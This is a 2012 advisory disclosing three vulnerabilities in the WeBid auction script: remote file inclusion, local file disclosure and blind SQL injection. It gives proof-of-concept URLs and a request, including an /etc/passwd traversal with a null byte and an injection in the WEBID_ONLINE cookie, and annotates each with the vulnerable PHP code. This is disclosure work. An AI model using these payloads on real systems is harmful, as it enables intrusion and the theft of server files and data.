扫码分享
验证:
体验盒子:::::::-. ...::::::.:::.
;;, `';, ;; ;;;`;;;;,`;;;
`[[ [[[[' [[[[[[[[. '[[
$$,$$$$$$$$$$ "Y$c$$
888_,o8P'88.d888888Y88
MMMMP"` "YmmMMMM""MMM YM
[ Discovered by dun \ posdub[at]gmail.com ]
[ 2012-08-17]
################################################
# [ WeBid <= 1.0.4 ] Multiple Vulnerabilities#
################################################
#
# Script: "Open source php/mysql fully featured auction script"
#
# Vendor: http://www.webidsupport.com/
# Download: http://sourceforge.net/projects/simpleauction/files/simpleauction/
#
################################################
# [RFI] ( allow_url_include = On; register_globals = On; )
# PoC: http://localhost/WeBid/loader.php?js=admin/logout.php&include_path=http://localhost/info.txt?
#
# File: ./WeBid/loader.php (lines: 15-60)
#..cut..
# ob_start('ob_gzhandler');
# header("Content-type: text/javascript");
# include 'includes/checks/files.php'; // 1 ( Definition of $file_hashs array )
# if (isset($_GET['js']))
# {
#$js = explode(';', $_GET['js']);// 3 js = admin/logout.php (for example)
#foreach ($js as $val)
#{
# $ext = substr($val, strrpos($val, '.') + 1); // 4
# if ($ext == 'php') // 4
# {
#if (check_file($val)) // 5
#{
# include $val;// 10 include admin/logout.php
#}
# }
#..cut..
#}
# }
# ob_end_flush();
#
# function check_file($file)
# {
#global $file_hashs; // 6
#$tmp = $file_hashs;
#$folders = explode('/', $file); // 7 $folders = Array([0] => admin, [1] => logout.php)
#foreach ($folders as $val)// 8 This loop checks if parts of $folders are in $file_hashs
#{
# if (isset($tmp[$val]))
# {
#$tmp = $tmp[$val];
# }
# else
# {
#return false;
# }
#}
#return true;// 9 admin/logout.php passed
# }
#..cut..
#
# File: ./WeBid/includes/checks/files.php (lines: 2-19)
#..cut..
# $file_hashs = array(// 2 List of files that can be included.
#..cut..
#'admin' => array(// 2
# 'logout.php' => 'a0db39b73dcfd29feb1466002c4f59a4', // 2
#..cut..
#),
#..cut..
# );
#
# File: ./WeBid/admin/logout.php (lines: 16-17)
#..cut.. // 11 common.inc.php file contains a definition of $include_path
# include '../includes/common.inc.php';// 11 Failed, because loader.php is in root path
# include $include_path . 'functions_admin.php'; // 12 *[RFI] $include_path is not set by script
#..cut.. // 12 If register_globals is On, we can set $include_path
#
################################################
# [Local File Disclosure] ( magic_quotes_gpc = Off; php version < 5.3.4 )
# PoC: http://localhost/WeBid/getthumb.php?fromfile=getthumb.php&w=../../../../../etc/passwd%00
#
# File: ./WeBid/getthumb.php (lines: 17-52)
#..cut..
# $w = (isset($_GET['w'])) ? $_GET['w'] : '';// 1
# $fromfile = (isset($_GET['fromfile'])) ? $_GET['fromfile'] : ''; // 2
# $nomanage = false;
#..cut..
# if (!isset($_GET['fromfile'])) // 3
# {
#ErrorPNG('params empty');
#exit;
# }
# elseif (!file_exists($_GET['fromfile']) && !fopen($_GET['fromfile'], 'r')) // 4
# {
#ErrorPNG('img does not exist');
#exit;
# }
#
# if (file_exists($upload_path . 'cache/' . $_GET['w'] . '-' . md5($fromfile)))// 5
# {
#$img = getimagesize($fromfile);
#if ($img[2] == 1)
#{
# $img['mime'] = 'image/png';
#}
#header('Content-type: ' . $img['mime']);
#echo file_get_contents($upload_path . 'cache/' . $_GET['w'] . '-' . md5($fromfile)); // 6 *[LFD]
#}
# }
#..cut..
#
################################################
# [Blind SQL Injection] ( magic_quotes_gpc = Off; )
# PoC:
# http://localhost/WeBid/contents.php
# GET /WeBid/contents.php HTTP/1.1
# Host: localhost
# User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:14.0) Gecko/20100101 Firefox/14.0.1
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: pl,en-us;q=0.7,en;q=0.3
# Accept-Encoding: gzip, deflate
# Connection: keep-alive
# Cookie: WEBID_ONLINE=-1' OR 1=1--
#
# File: ./WeBid/contents.php (lines: 15, 38)
#..cut..
# include 'includes/common.inc.php';
#..cut..
# include 'header.php';// 1
#..cut..
#
# File: ./WeBid/header.php (line: 26)
#..cut..
# $counters = load_counters(); // 2
#..cut..
#
# File: ./WeBid/includes/functions_global.php (line: 287-320)
#..cut..
# function load_counters() // 3
# {
#..cut..
#if (!$user->logged_in)
#{
# if (!isset($_COOKIE['WEBID_ONLINE']))
# {
#$s = md5(rand(0, 99) . session_id());
#setcookie('WEBID_ONLINE', $s, time() + 900);
# }
# else
# {
#$s = $_COOKIE['WEBID_ONLINE'];// 4
#setcookie('WEBID_ONLINE', $s, time() + 900);
# }
#}
#..cut..
#$query = "SELECT id FROM " . $DBPrefix . "online WHERE SESSION = '$s'"; // 5 *[SQL]
#$res = mysql_query($query);
#$system->check_mysql($res, $query, __LINE__, __FILE__);
#..cut..
#
### [ dun / 2012 ] #############################
体验盒子
